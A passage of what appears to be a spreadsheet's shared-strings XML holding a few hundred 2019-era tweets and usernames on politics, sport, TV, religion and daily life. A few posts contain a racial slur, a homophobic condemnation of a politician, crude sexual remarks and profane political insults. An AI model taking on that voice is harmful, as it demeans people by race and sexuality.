    <t>Que??: Did Bernie Sanders just try to "Bern-'Splain" cancer to Joe @#$% Biden, whose son, Beau, died of brain cancer just a few years ago? What good does it do to master social studies if you flunk social skills?</t>
  </si>
  <si>
    <t>lipskm</t>
  </si>
  <si>
    <t>HOLY SHIT THE VIDEO IS AMAZING</t>
  </si>
  <si>
    <t>nellbergcricket</t>
  </si>
  <si>
    <t>What camp you in? The "Timmy Paine made runs on it ffs, it's the M1, #useyoureyes" camp Or The "England can barely bat a session out at the best of times ffs, #useyoureyes" camp (Lesser spotted "Ben Stokes is mint, #useyoureyes camp also I guess) #Ashes19 #ENGvAUS</t>
  </si>
  <si>
    <t>cmkneipp</t>
  </si>
  <si>
    <t>Read this article and TBH the takeaway for me is, TRUMP IS SO INSANE THAT HE EVEN MADE SCOMO LOOK INTELLIGENT AND MEASURED. That, my friends, is some serious bat-shit-craziness. https://t.co/boUYmIZdOY</t>
  </si>
  <si>
    <t>Milo_Jay</t>
  </si>
  <si>
    <t>Did this new iPhone update get rid of the find my friends app?</t>
  </si>
  <si>
    <t>OnboardRoss</t>
  </si>
  <si>
    <t>@DustinCheckley This explains the call I got from the plant a couple of weeks ago . "Do not engage in any fashion."</t>
  </si>
  <si>
    <t>JenApparently</t>
  </si>
  <si>
    <t>Janine &amp; I watching GLOW: Me: UGH. Of course. Fucking Showmances are the worst! They make everyone miserable. Janine: Speaking from experience, honey? Me: YES. The entirety of my 20s! Janine: &gt;.&gt; Me: WHAT?! I have experience! Showmances are the worst.</t>
  </si>
  <si>
    <t>Metalm68</t>
  </si>
  <si>
    <t>@MarkMaddenX Actually, he’d be a sellout for staying with the Raiders.</t>
  </si>
  <si>
    <t>Proton_Jon</t>
  </si>
  <si>
    <t>@camille_skyloft @roselii49 @Wrath0jumneyman @tehMorag @iKasperr Close to "War and Peace" sized plot here.</t>
  </si>
  <si>
    <t>lornaaaa_xo</t>
  </si>
  <si>
    <t>@hirst_arron Am jel ad love to see em</t>
  </si>
  <si>
    <t>THEHOODFLUENCER</t>
  </si>
  <si>
    <t>@kingnahlaa @shloerpapi THE GIRLS ARE FIGHTING!? https://t.co/Bn6QqFmY6S</t>
  </si>
  <si>
    <t>msmullin</t>
  </si>
  <si>
    <t>@KSPrior I used to make my divinity students read portions of Zissner and Strunk&amp;White. Like you said—it’s not their fault</t>
  </si>
  <si>
    <t>Theques56207512</t>
  </si>
  <si>
    <t>@CapelLofft Don’t you just love the privileged middle class.</t>
  </si>
  <si>
    <t>SparkyRobot</t>
  </si>
  <si>
    <t>@DawsePaws @DPD_UK Thankfully you were able to retrieve it, what with your broken leg and all. Geez, get it together @DPD_UK! 😠</t>
  </si>
  <si>
    <t>12mrcool</t>
  </si>
  <si>
    <t>@DronRBLX 6. Keep in mind I have done literally nothing for him to do this, Yes I stayed in RCD instead of going with him. I was in this tophat entertainment server before all this. He demoted me to nothing I couldn't do anything so I just left because I didn't see the point of staying</t>
  </si>
  <si>
    <t>ABCWorldNews</t>
  </si>
  <si>
    <t>Democrats propose spending trillions to fight climate change. https://t.co/sgtP5kvsMV</t>
  </si>
  <si>
    <t>jadetasker_</t>
  </si>
  <si>
    <t>although my work trips to Vancouver kill me off I’m sad that this is my last trip here for a while 🇨🇦</t>
  </si>
  <si>
    <t>JameJame96</t>
  </si>
  <si>
    <t>@jvn @ewarren Honey I hate to break it to you but under warrens plan you’d still be out a shit ton of money</t>
  </si>
  <si>
    <t>AlexMosnick</t>
  </si>
  <si>
    <t>Abaco Islands, at a Remove From the Bahamas’ Resorts, Feel Dorian’s Wrath https://t.co/79CtNkkSb4 https://t.co/2bGfwg9ZUL</t>
  </si>
  <si>
    <t>IvoryyIce</t>
  </si>
  <si>
    <t>My neighbor and guy friend came over to drop my tripod off but somehow started watching a movie so no sleeping early for me lol 😅</t>
  </si>
  <si>
    <t>alan_whitcomb</t>
  </si>
  <si>
    <t>WHAT DOES IT MEAN THAT LOVE IS NOT EASILY ANGERED (1 Corinthians 13:5)? Love is an attribute of God and one of His gifts to us. First Corinthians 13 offers tremendous perspective regarding the true nature of... https://t.co/ZsfhqwaZUG</t>
  </si>
  <si>
    <t>galooticus</t>
  </si>
  <si>
    <t>Nice to know that @metricbuttload isn't dead. https://t.co/6ASarXSqzl</t>
  </si>
  <si>
    <t>cabezao</t>
  </si>
  <si>
    <t>@KevinThorner @hydehunter2017 Don't go that further, look at us in Venezuela, in 2012 we gave away that right, now we have nothing but stones and balls to defend ourselves... In Venezuela the National Police kills more people than ISIS can kill in one year. It is a reality hard to understand.</t>
  </si>
  <si>
    <t>JoseThatMexican</t>
  </si>
  <si>
    <t>@GameStop House of the dead</t>
  </si>
  <si>
    <t>bss_1231</t>
  </si>
  <si>
    <t>@kailah_casillas @perrymattfeld Check out The Spy on @netflix , 6 part series. Really good</t>
  </si>
  <si>
    <t>mucho98</t>
  </si>
  <si>
    <t>visit the link https://t.co/CD1YFoTkHS to cop your bands, we go jam hardd https://t.co/LGil5aDFmq</t>
  </si>
  <si>
    <t>BosGuy</t>
  </si>
  <si>
    <t>Mixing things up for all of you who are use to seeing 20-somethings with no body fat. This guy is making me think that I need to get to the gym. #meninkilts https://t.co/Unm6fUY8jn https://t.co/RlOAcWvcJq</t>
  </si>
  <si>
    <t>AfureAdah</t>
  </si>
  <si>
    <t>It’s my birthday and @KylieJenner is posting videos of her dogs??</t>
  </si>
  <si>
    <t>NuffieldHealth</t>
  </si>
  <si>
    <t>@sstanes This is poor Sophie. Could you DM your contact number and I'll get a member of our health assessments team to call you today. ^BB https://t.co/WoWnPOUM9L</t>
  </si>
  <si>
    <t>markgom62932819</t>
  </si>
  <si>
    <t>@itsleepeart hey hope you ok I love to meet you so very much</t>
  </si>
  <si>
    <t>Jerry_I_is</t>
  </si>
  <si>
    <t>I see we’re still trying to half ass pLAy ouT fRoM thE baCk 🥴😭😑</t>
  </si>
  <si>
    <t>SwassMH</t>
  </si>
  <si>
    <t>How you respond to gettin tried will tell someone all they need to know about you🤷🏽‍♂️ gotta tighten up</t>
  </si>
  <si>
    <t>gilbmarie</t>
  </si>
  <si>
    <t>@adamcbest She knew the truth and still voted the rapist in.....she is an enabler</t>
  </si>
  <si>
    <t>_briannaraye</t>
  </si>
  <si>
    <t>stop buying them lil carts that get sold for $50 or less from your local plug bc you never know what you’re getting, but just know for sure it isn’t no 94.7% thc 🤷🏻‍♀️ it’s cut with things that are killing folks. that black market shit that ppl think is real bc the packages look it</t>
  </si>
  <si>
    <t>HappyHopkins</t>
  </si>
  <si>
    <t>Dissociation: The Ultimate Superpower? https://t.co/oUIUsYHRhf</t>
  </si>
  <si>
    <t>silverpebble</t>
  </si>
  <si>
    <t>@charlotte_sews @LevParikian I could empty an entire jar into my mush and sit yearn for more</t>
  </si>
  <si>
    <t>DavidWo13190869</t>
  </si>
  <si>
    <t>@LBC yeah get him caught so we can give him some stiff community service, because when it goes to court it will turn out that he is a victim too...........</t>
  </si>
  <si>
    <t>scorch12sixtwo</t>
  </si>
  <si>
    <t>@mangorijima I mean.... you could put Ryuji’s smug smile face on Ann’s and say he dressed up as her? 🤔🤔🤔</t>
  </si>
  <si>
    <t>kirbyguymike</t>
  </si>
  <si>
    <t>I just made $109get a $25 sign on bonus share your link with others and you get $10 per sign up here's my link join under and make the same money &amp;lt;a href="https://t.co/dpIQajx4x9" class="ext"&amp;gt;https://t.co/e2koTk8PId;</t>
  </si>
  <si>
    <t>HollyBranson</t>
  </si>
  <si>
    <t>I’m so proud of everything @VirginTrains has achieved – in 22 years they haven’t stopped innovating and improving. It’s such a special @Virgin company, made up of brilliant minds and passionate people https://t.co/TFpmIlNTMX #VirginFamily #TuesdayThoughts https://t.co/5pT4qWQLY1</t>
  </si>
  <si>
    <t>Bighungry2x</t>
  </si>
  <si>
    <t>Twitter targeted ads are funny. The ONLY ads I’m getting are purely in Japanese, so I can’t read any of it. Kind of a blessing. Also, here is an owl from an owl cafe we went to today for lunch. #Tokyo https://t.co/yTOP9YpHfR</t>
  </si>
  <si>
    <t>SharonDanielleB</t>
  </si>
  <si>
    <t>@waltshaub He didn't need to mention a qpq. He just DID it. Message sent.</t>
  </si>
  <si>
    <t>hurlthatsphere</t>
  </si>
  <si>
    <t>@wendyradio I'm beginning to expect this https://t.co/CdYkYlY4SZ</t>
  </si>
  <si>
    <t>billg5050</t>
  </si>
  <si>
    <t>@EpochTimes @AOC For blocking users on Twitter, really is that where we've gone now.. Wow</t>
  </si>
  <si>
    <t>CBarca_</t>
  </si>
  <si>
    <t>So is the 1pm CBS game Patriots-Dolphins or Giants-Bills?</t>
  </si>
  <si>
    <t>IPPA_NIGP</t>
  </si>
  <si>
    <t>Our 8th Annual Reverse Vendor Trade Show @BoiseCentre is next month - "Collaborate, Cooperate, and Communicate!" Event highlights: Keynote Speaker, @TammyRimes, Executive Director of @_NCPP, Philanthropy Partner: @loveBBP, &amp; offering 6 break-out sessions! #government #vendors https://t.co/LsdajLKfbt</t>
  </si>
  <si>
    <t>Rogsternation</t>
  </si>
  <si>
    <t>@AcousticJulia Thus far, the mice cannot resist the peanut butter. Until they can, they will continue to perish.</t>
  </si>
  <si>
    <t>titMcGrit2</t>
  </si>
  <si>
    <t>@BrutalityinCarn Tweeter of the month</t>
  </si>
  <si>
    <t>eamorris_</t>
  </si>
  <si>
    <t>The cancelled have created a counterculture of redemption - The Post Millennial https://t.co/moM6Yxw4Lm</t>
  </si>
  <si>
    <t>Anil_Bluez</t>
  </si>
  <si>
    <t>@IamSandeep25 But 7:11 pm here in kathmandu 😉😉 So Good Evening to you 😉😉😁</t>
  </si>
  <si>
    <t>HoustonMargaret</t>
  </si>
  <si>
    <t>@GeraldoRivera There's a difference between hi-jinks and rape, Geraldo.</t>
  </si>
  <si>
    <t>marrynman</t>
  </si>
  <si>
    <t>@whohearer And when the eyes are dead it says a lot.</t>
  </si>
  <si>
    <t>ariesburrell_</t>
  </si>
  <si>
    <t>Smh I just learned how to do a cartwheel 😂</t>
  </si>
  <si>
    <t>HPbasketball</t>
  </si>
  <si>
    <t>After opening at 39.5, Mavs are up to 41 for win total at Westgate.</t>
  </si>
  <si>
    <t>NLMB_4L</t>
  </si>
  <si>
    <t>This nigga Da Baby said , I need a coupon for that pussy because you know I’m not paying for it 😂😂🤣</t>
  </si>
  <si>
    <t>mrslowbones</t>
  </si>
  <si>
    <t>Hey @jack_obrien and @milesofgray! Did you know that together you make a Star Trek Fan favorite, Miles O'brien? Who's wife is...Japanese? I've found the convergence #zeitgang https://t.co/sUsXh9FaSG</t>
  </si>
  <si>
    <t>Kevina_xox</t>
  </si>
  <si>
    <t>@antanddec @imacelebrity It's the most..wonderful time of the year 👀🙌</t>
  </si>
  <si>
    <t>yodeI</t>
  </si>
  <si>
    <t>@chunin1k the new fireforce 1s</t>
  </si>
  <si>
    <t>DianeLynn1812</t>
  </si>
  <si>
    <t>@Denton21990 @DebtTrut If not stupid, they are crooked and complicit.</t>
  </si>
  <si>
    <t>esther_pew</t>
  </si>
  <si>
    <t>@lovelorijewelry the answer is always yes</t>
  </si>
  <si>
    <t>Mizz_LU_LU</t>
  </si>
  <si>
    <t>Wise use of your negotiation skills can help land an aspiratio... More for Aries https://t.co/azBBbKLLJb</t>
  </si>
  <si>
    <t>marksimner</t>
  </si>
  <si>
    <t>@rgpoulussen @James1940 I remember my first podcast with a famous historian. It was nerve wrecking! 😂 You did great mate, really enjoyed the chat.</t>
  </si>
  <si>
    <t>LeaderABW</t>
  </si>
  <si>
    <t>A Sandhill crane woke me up about 8AM yesterday by yelling its call right on the other side of my bedroom wall! These are huge birds that stand about waist-high. They make a LOUD yell. I'm thinking I'll invest in a motion-activated sprinkler...should make him stand back at least</t>
  </si>
  <si>
    <t>kaatti3</t>
  </si>
  <si>
    <t>I’ve been debating if I want food or not and idk 😩</t>
  </si>
  <si>
    <t>windthin</t>
  </si>
  <si>
    <t>@thorfinn911 @IMontoyaResists And the creators of the atomic bomb... well. I know what you mean. Some doors once opened. The big point I think is that it was definitely NOT meant to be in the hands of civilians.</t>
  </si>
  <si>
    <t>alex203ct</t>
  </si>
  <si>
    <t>@Loriann22319391 @salpaulsen @RudyGiuliani @realDonaldTrump There are mental institutions for Russian BOT delusional treatment. Currently overfilled with #LiberalismIsAMentalDisorder</t>
  </si>
  <si>
    <t>tennohasashi</t>
  </si>
  <si>
    <t>Tenno and me just switched phones again, I swear his timeline always be lit. He’s got Arabian friends and shit. I don’t even know how he understands the tweets , but he does 🤷🏻‍♀️</t>
  </si>
  <si>
    <t>LouisaVinton</t>
  </si>
  <si>
    <t>Up early for a practice run at scenic Turtle Lake, an oasis of calm and cafes in the hills above #Tbilisi. Hoping not to embarrass our intrepid @ungeorgia team in the upcoming #TbilisiMarathon on 29/9, sponsored for charity by #HeidelbergCement https://t.co/1lA96ZKR1B</t>
  </si>
  <si>
    <t>SueWrinch</t>
  </si>
  <si>
    <t>Deciding poems for Loose Muse Showcase for Winchester Poetry Day ⁦@WinPoetryFest⁩ on October 12th ⁦@WinchesterDC⁩ also baked a rhubarb cake. 😀 https://t.co/mUYSYWOcrc</t>
  </si>
  <si>
    <t>globalmedic1</t>
  </si>
  <si>
    <t>JEREMIAH 29:13 AMP: Then [with a deep longing] you will seek Me and require Me [as a vital necessity] and [you will] find Me when you search for Me with all your heart. https://t.co/rwZTd890g0</t>
  </si>
  <si>
    <t>OfficialTXCAIN</t>
  </si>
  <si>
    <t>@genericoreo @bdmicho I'm 30 stop playing with me before u get what u asking for and ain't no turning back frfr now enjoy your day</t>
  </si>
  <si>
    <t>majingojira1</t>
  </si>
  <si>
    <t>@PowersOfDoom @XavierFiles It's from Secret Wars: Inferno, I think. Dennis Hopeless wrote it, and it's one of his better gags.</t>
  </si>
  <si>
    <t>backboneprog</t>
  </si>
  <si>
    <t>Laid off and owed pay: the Kentucky miners blocking coal trains https://t.co/NTatyK8zsv</t>
  </si>
  <si>
    <t>pcgame</t>
  </si>
  <si>
    <t>What will the Terminator play like in Mortal Kombat 11? Link: https://t.co/OKqTj2X0aH #arnold #education #educational #gameplay #KombatPack #mk #mkterminator #mk11 #mk11dlc #mk11kombatpack #mk11terminator #mk11terminatordlc #mortalkombat #mortalkombat11 https://t.co/Gl1QtyMgxD</t>
  </si>
  <si>
    <t>anthonass</t>
  </si>
  <si>
    <t>@seajink Submit that shit to @_StylesZX2</t>
  </si>
  <si>
    <t>GeorgeWbourne</t>
  </si>
  <si>
    <t>Brought luckett this back from holiday and Iv just seen he’s with another lad wtf? https://t.co/8Ucx5dajgw</t>
  </si>
  <si>
    <t>AnthonyGaenzle</t>
  </si>
  <si>
    <t>Learn how to protect your company’s digital assets #digitalassets #marketing https://t.co/pAVqcgejNy</t>
  </si>
  <si>
    <t>mjstandridge</t>
  </si>
  <si>
    <t>@PeteButtigieg the God I know deem homosexuality a sin-Sodom &amp;Gomorrah. Read what God said about this in 1 Corith 6:9-11, Rom. 1:26-27, the Bible is full of God’s thoughts on sexual immorality-don’t preach to me when you openly do a sinful act as a homosexual</t>
  </si>
  <si>
    <t>Sir_Sulli</t>
  </si>
  <si>
    <t>I’m gonna say it. I hate Clemson fans and I despise the school, but the Clemson football team is really damn good.</t>
  </si>
  <si>
    <t>MarieBL1878</t>
  </si>
  <si>
    <t>@clmcefc @Joannecolaa Hey you, he’s my boy! She’s already eyeing up André she’s not having Henry too 😂😂</t>
  </si>
  <si>
    <t>DudeGottaGo</t>
  </si>
  <si>
    <t>@EJ_Mathews @thedailybeast We need to be EXTREMELY careful of one person and/or a small group of ppl speaking on the behalf of our ENTIRE community. That’s how we ended up with the term African American in 89 by Jesse Jackson. Oh and Candace is not 100% correct. White Nationalism makes that list of 100!</t>
  </si>
  <si>
    <t>DavidJacksonTom</t>
  </si>
  <si>
    <t>Fitness exercise and weight loss exercise https://t.co/EvyBzGNWjx https://t.co/1odItvPLwO</t>
  </si>
  <si>
    <t>MascarabyamyAmy</t>
  </si>
  <si>
    <t>I just want to buy new shoes and travel! I just want to live by the beach and cook soup and drink coffee on a porch looking at water! Share some of your goals with me!</t>
  </si>
  <si>
    <t>JazEscape</t>
  </si>
  <si>
    <t>I am devastated that this will be the last season of @BoJackHorseman 😫😭 This show gives me life💚 https://t.co/H6dK7mM22F</t>
  </si>
  <si>
    <t>jraymond9205</t>
  </si>
  <si>
    <t>@ABC Not a whistleblower. A leaking CIA employee with second hand info, political bias against Trump and an attorney with connections to Biden and Clinton’s. Sounds like BS to me!!</t>
  </si>
  <si>
    <t>formarrowdbs</t>
  </si>
  <si>
    <t>@MacTXPress So, you want to leave your seat for a Democrat? Got it</t>
  </si>
  <si>
    <t>PoloniaForTrump</t>
  </si>
  <si>
    <t>@RepCummings Just resign dude, please. You bring shame to #Baltimore. #TermLimits, now</t>
  </si>
  <si>
    <t>GarryGrieves_</t>
  </si>
  <si>
    <t>Turn on your grace and sense of glamor to wow potential client... More for Sagittarius https://t.co/GZ1ZAJHVet</t>
  </si>
  <si>
    <t>ChambersburgCC</t>
  </si>
  <si>
    <t>Last call for the fall ladies semester which begins next week! Don't miss this semester with on course coaching, details here: https://t.co/jBbwxJg2GV https://t.co/KqPT7FB4in</t>
  </si>
  <si>
    <t>earthlingthing</t>
  </si>
  <si>
    <t>People ask me what I want to do with my degree but I don't think the job I want to do exists</t>
  </si>
  <si>
    <t>IneffectiveMath</t>
  </si>
  <si>
    <t>@ShutdownLine Every day I understand less and less</t>
  </si>
  <si>
    <t>_kBandz</t>
  </si>
  <si>
    <t>@BossesPizza the best pizza on earth. Let’s argue. 🤷🏽‍♀️</t>
  </si>
  <si>
    <t>reckhauser</t>
  </si>
  <si>
    <t>@seattletimes Where does the electricity come from?</t>
  </si>
  <si>
    <t>Unknwn_Lunchbox</t>
  </si>
  <si>
    <t>I must have went to house heaven.</t>
  </si>
  <si>
    <t>ATrendyNiteClub</t>
  </si>
  <si>
    <t>@MattNovacek My air bnb was on Haskell st and is similar in location to downtown Austin nightlife to my old place in downtown Columbus. Based on the traffic being backed up at 10am and my Uber driver saying traffic is always poor in Austin, I would find it difficult as a downtown Austin 1/</t>
  </si>
  <si>
    <t>deereedawson</t>
  </si>
  <si>
    <t>When are y’all going to the festival? I’m in bed still 🥴</t>
  </si>
  <si>
    <t>LivingArt17</t>
  </si>
  <si>
    <t>@ChristmasUptown @pamnonga The club as well</t>
  </si>
  <si>
    <t>MaryKatherineM8</t>
  </si>
  <si>
    <t>@ScottFordTVGuy I trust God who commanded us with caring for the earth so that all generations may enjoy its beauty and bounty. That many do not will not change with screaming, blaming, brainwashing kids and threats. I will not be guilted for what others do not do.</t>
  </si>
  <si>
    <t>piihn</t>
  </si>
  <si>
    <t>but whatever... God will make a way for me. 💔</t>
  </si>
  <si>
    <t>edgelord_94</t>
  </si>
  <si>
    <t>@LigmaBullz emily is the time of my life</t>
  </si>
  <si>
    <t>shieldsgazette</t>
  </si>
  <si>
    <t>How did our own MPs vote as Prime Minister Boris Johnson made a fresh bid to spark a general election? https://t.co/RwTXUjwkXs</t>
  </si>
  <si>
    <t>Dubhlaine</t>
  </si>
  <si>
    <t>@HiltonHotels When speaking with the agent (who was great by the way) he mentioned that on night was double booked in aug but he went ahead and cancelled all nights for August rebooking in September. He also made two separate reservations for September to obtain our corporate rate</t>
  </si>
  <si>
    <t>idracc1</t>
  </si>
  <si>
    <t>Hirohito, Hitler, Mussolini, Petain, Quisling, Engdahl, Tsolakoglou, Logothetopolous, Rallis, Klimaitis, Kratzenberg, Churchill, Gladstone, were NAZI sympathizers, fascists or wanted the NAZIs to defeat the Soviet Union for them. What is different now? https://t.co/BwFD0aSdfR</t>
  </si>
  <si>
    <t>GooseBoldrini</t>
  </si>
  <si>
    <t>@fakeaarontweets @G_Padraic Considering the absolutely bizarre nature of the allegation and my comments about the scenario actually playing out, which I don't find irrelevant, imma go with unlikely or atleast not like it is described.</t>
  </si>
  <si>
    <t>Seahawkscrazy</t>
  </si>
  <si>
    <t>@JPAULBISHOP @bkey1970 Only if you have the means to change your situation. If you don’t, I can see why. Feeling trapped and looking for a scapegoat isn’t race specific though.</t>
  </si>
  <si>
    <t>gzr3625</t>
  </si>
  <si>
    <t>@b_b_baconator I have already felt a backlash against religious leaders. I still am a Christian and try to follow Jesus' teaching but reject the leaders who preach hate and support DJT.</t>
  </si>
  <si>
    <t>yokooo07</t>
  </si>
  <si>
    <t>I want some breakfast and like 7 mimosas.</t>
  </si>
  <si>
    <t>CryptoBoof</t>
  </si>
  <si>
    <t>if China cannot ban Bitcoin what makes you think the rest of the world can?</t>
  </si>
  <si>
    <t>rudabega6</t>
  </si>
  <si>
    <t>DUDE why are the Wolverines giving up on 3rd down</t>
  </si>
  <si>
    <t>paula_gardiner</t>
  </si>
  <si>
    <t>@scottmcgavin_ Got the box set at home. I’ll give it a go 😊 x</t>
  </si>
  <si>
    <t>utd_Lewis</t>
  </si>
  <si>
    <t>Man United Arsenal West Ham The three banter clubs of the Premier League</t>
  </si>
  <si>
    <t>sportsthread</t>
  </si>
  <si>
    <t>@Swjr54 We 👀 you!! Post this on our app so more college coaches and fans can watch you ball out💪 💯 Video of the Week will be featured to all coaches/fans on twitter &amp; IG🙌 ttps://www.sportsthread.com/profile/0/edit?type=athlete</t>
  </si>
  <si>
    <t>rock_itman</t>
  </si>
  <si>
    <t>@OSUmommaDOC Whoa! Oh yeah, I'm quite the foodie. Capri is a good call.</t>
  </si>
  <si>
    <t>petmeep</t>
  </si>
  <si>
    <t>I ordered Melanie Martinez’ k-12 sweater about 2 days ago and I CANT stop thinking about it🥺 I’m so excited</t>
  </si>
  <si>
    <t>nat_mdz</t>
  </si>
  <si>
    <t>I’m so ready for a new look 👀</t>
  </si>
  <si>
    <t>ItsSunnyyy</t>
  </si>
  <si>
    <t>This is why I don’t ever come home anymore I’m fucking home two seconds and my mom starts bitching at me the second I walk in 🙄🙄🙄</t>
  </si>
  <si>
    <t>nj_ember</t>
  </si>
  <si>
    <t>@LisetteRyser @mstiefvater You’re welcome! If I get any more adult books on audio in the future I’ll keep you in mind. 🖤</t>
  </si>
  <si>
    <t>ABC7Chicago</t>
  </si>
  <si>
    <t>Police seek to identify teen girl found in Gary alley https://t.co/WmQOPsmUv3</t>
  </si>
  <si>
    <t>lukeeeey92</t>
  </si>
  <si>
    <t>@sendtoesplz @jjksu4ria He withheld aid to the Ukrainian government so they would spy on Joe Biden for him</t>
  </si>
  <si>
    <t>giacoknox</t>
  </si>
  <si>
    <t>@lilbuddyspd11 @iWideOpen @MidmodArtist @DebraMessing When you're ready and capable, please tweet your thoughts in English. I used to tutor ESL students, but whatever you're trying to communicate is beyond my comprehension...</t>
  </si>
  <si>
    <t>RudyHuyn</t>
  </si>
  <si>
    <t>@Micro_666 💯 And UWP makes your games much safer both for customers (sure it won't break your system) and for publishers (anti-piracy system).</t>
  </si>
  <si>
    <t>KathyPe19474092</t>
  </si>
  <si>
    <t>@Noha_Mostafa_ I hate that too and I don't get it either just hope he's okay.</t>
  </si>
  <si>
    <t>benjaaquila</t>
  </si>
  <si>
    <t>The world's first transgender professional boxer is now the face of #Everlast https://t.co/frWdu9Qdy0 #LGBT #transrights #humanrights #equality @Everlast_ @benjaaquila https://t.co/u0AzkVzF5y</t>
  </si>
  <si>
    <t>jay2josh</t>
  </si>
  <si>
    <t>@TomiLahren @jemelehill @jemelehill continues to justify why i won’t pay for a @TheAthleticCFB subscription. Why would i pay and support her in any way?</t>
  </si>
  <si>
    <t>BerniesBack2020</t>
  </si>
  <si>
    <t>@Disqeet @TimberGhost7 Thanks for reading! ✊</t>
  </si>
  <si>
    <t>inoelshikari</t>
  </si>
  <si>
    <t>The Goldfinch ⭐️⭐️⭐️ I was prepared for disappointment but it wasn’t THAT bad. The film stayed close to the book and covers a lot of ground over many years, I felt like it didn’t know which story it was trying to tell, and so felt like shorts attempting to tell one narrative.</t>
  </si>
  <si>
    <t>4realchris82</t>
  </si>
  <si>
    <t>@TomTheHerman I guess coke didn’t want to pick up their regular season win cup</t>
  </si>
  <si>
    <t>Blu_ReyMysterio</t>
  </si>
  <si>
    <t>@NylaRoseBeast Awww, really cool. If you want to more faces</t>
  </si>
  <si>
    <t>prajwal1402</t>
  </si>
  <si>
    <t>@ZazzyJets And that a problem! Gaze mentioned it to - holds the ball way to long sometimes</t>
  </si>
  <si>
    <t>JMGraham77</t>
  </si>
  <si>
    <t>Two pictures - two messages - read &amp; take note peeps! Simple words create simple messages with deep meaning! Me personally I love a good hug &amp; I am more than happy to listen and give a hug!!! 💚 https://t.co/51cLdvW4Xe</t>
  </si>
  <si>
    <t>wsvn</t>
  </si>
  <si>
    <t>#UPDATE - A law enforcement official says investigators that examined the burned-out wreckage of a scuba diving boat haven't been able to determine what ignited a fire that killed 34 people off the California coast. https://t.co/dYZqqdmA5j</t>
  </si>
  <si>
    <t>MaloufInsurance</t>
  </si>
  <si>
    <t>A regular car insurance policy probably won't provide protection if you're driving your personal vehicle for a ride-sharing company. https://t.co/IOhgcs24Ey</t>
  </si>
  <si>
    <t>trimethelp</t>
  </si>
  <si>
    <t>@BuildSoil That is not good. Can you tell us the bus number and stop information so we can look into this for you?^AC</t>
  </si>
  <si>
    <t>missMwaters</t>
  </si>
  <si>
    <t>My music shuffle goes from Bonnie Tyler to Cardi B real quick and I love it</t>
  </si>
  <si>
    <t>david_smith1781</t>
  </si>
  <si>
    <t>Im putting my faith in you god from here out help me with my struggles and you know what im going through.</t>
  </si>
  <si>
    <t>minnman47</t>
  </si>
  <si>
    <t>Christian Artists Can't Be Forced to Make Gay Wedding Invites, Arizona Supreme Court Rules https://t.co/Omm1CkCvEP #Faith via @pjmedia_com</t>
  </si>
  <si>
    <t>kylesellers</t>
  </si>
  <si>
    <t>@TKashubin @SaraSmirks @AmoneyResists @realDonaldTrump Unless they tacked on the 15 cents and not $0.60. Those $0.15 cents, whether itemized or not, add up.</t>
  </si>
  <si>
    <t>darth_jeffR</t>
  </si>
  <si>
    <t>Synchronicity with the #Lodge49 art this week: a lady I follow on Instagram had this on her story feed. 🧐 https://t.co/ws7CRxCHnu</t>
  </si>
  <si>
    <t>catyugen</t>
  </si>
  <si>
    <t>@andiethistreety However my biceps do feel sore and I deadlifted yesterday</t>
  </si>
  <si>
    <t>Debbietazz</t>
  </si>
  <si>
    <t>@thebradfordfile Thank you for making that clear. 😏</t>
  </si>
  <si>
    <t>Grohlism93</t>
  </si>
  <si>
    <t>@muhammad_tee7 Put rolling back in the game too. It's unbelievably bad now. I can't roll after something hits my shield because for some reason intangibility ends before I reach the other side of my opponent.</t>
  </si>
  <si>
    <t>BoutiqueMags</t>
  </si>
  <si>
    <t>Marco Panconesi, the Balenciaga Alumnus Now Making His Own Jewellery.. https://t.co/WkjuTY0Kis https://t.co/LfCzDDdLZI</t>
  </si>
  <si>
    <t>891maxfm</t>
  </si>
  <si>
    <t>#OPP continues to lay charges in overdose-related deaths. @OPP_CR https://t.co/27owo7P8Ma https://t.co/MCyVapryTG</t>
  </si>
  <si>
    <t>Daniloraatz</t>
  </si>
  <si>
    <t>[Read] Kindle Statistical Rethinking: A Bayesian Course with Examples in R and Stan (Chapman &amp; Hall/CRC Texts in Statistical Science) &gt;&gt; https://t.co/1NrGkXIO3V</t>
  </si>
  <si>
    <t>baronjepson</t>
  </si>
  <si>
    <t>@fixurheart2016 Problems may warrant your endless pondering but You may have a vitamin or mineral deficiency this is very common. I suffered 10 years of exhaustion and declining health, doctors never found anything in blood tests until I got private ones this year. I had a B12 definicincy :( :)</t>
  </si>
  <si>
    <t>RickMacDonnell</t>
  </si>
  <si>
    <t>@LabourLawAlex @abbisiler Brave recommendation! Also good for your mom! I’m always impressed when someone can find the empathy required to love this book.</t>
  </si>
  <si>
    <t>_NedPeters</t>
  </si>
  <si>
    <t>@DocInFamily *one thing you and haven't talked about is whether or not your clinic will take in any patients who might have connections with any case that I work.*</t>
  </si>
  <si>
    <t>nosheepzone</t>
  </si>
  <si>
    <t>@VictorianDad and Corbyn Crap Deal does not have FoM We must have FoM It is a red line</t>
  </si>
  <si>
    <t>Una_Bella_Donna</t>
  </si>
  <si>
    <t>@AdrianXpression @KekePalmer Please tell the story...why are you blocked?</t>
  </si>
  <si>
    <t>nyarkee</t>
  </si>
  <si>
    <t>@AamAnusorn @benjaminbrasier @_earth40 @pavelphoom @WDdome @ChenRcj @achidb @toeipunch @2Moonstheseries @MotiveVillage I think 12 episodes are not enough to bring out each couple’s own issues and stories.</t>
  </si>
  <si>
    <t>jenn_next_door</t>
  </si>
  <si>
    <t>@krisis86 That’s so thoughtful and sweet. She’ll love them. ☺️</t>
  </si>
  <si>
    <t>mbvukutaphiri</t>
  </si>
  <si>
    <t>I'm at MV Lord Of The Isles @ Kennacraig https://t.co/4yK0pX1HQn</t>
  </si>
  <si>
    <t>epicgeezr</t>
  </si>
  <si>
    <t>@realmnsportsfan @UKSkol Lmao I'll take it for team if it gets us one damn trophy</t>
  </si>
  <si>
    <t>manofnone1</t>
  </si>
  <si>
    <t>@TheHawkHeaven I’m a Husker fan, and I’m even pissed off about what the Des Moines register wrote. Fuck those politically correct douches.</t>
  </si>
  <si>
    <t>duckm4st3r</t>
  </si>
  <si>
    <t>Dank Vapes And THC Products Linked To Many Vaping Illness Cases : Shots https://t.co/ndzHvi3QZc https://t.co/LBsCRpTftj</t>
  </si>
  <si>
    <t>ItsJustTii</t>
  </si>
  <si>
    <t>@BeingBrandyn_ Yerp. And makes a lot of racial remarks</t>
  </si>
  <si>
    <t>rhiannon_eg</t>
  </si>
  <si>
    <t>My boo played when the party’s over for me and said he heard it and knew I would love it 🥺 💗</t>
  </si>
  <si>
    <t>Jstayskickinit</t>
  </si>
  <si>
    <t>Keep focused and keep saving. All hundreds.</t>
  </si>
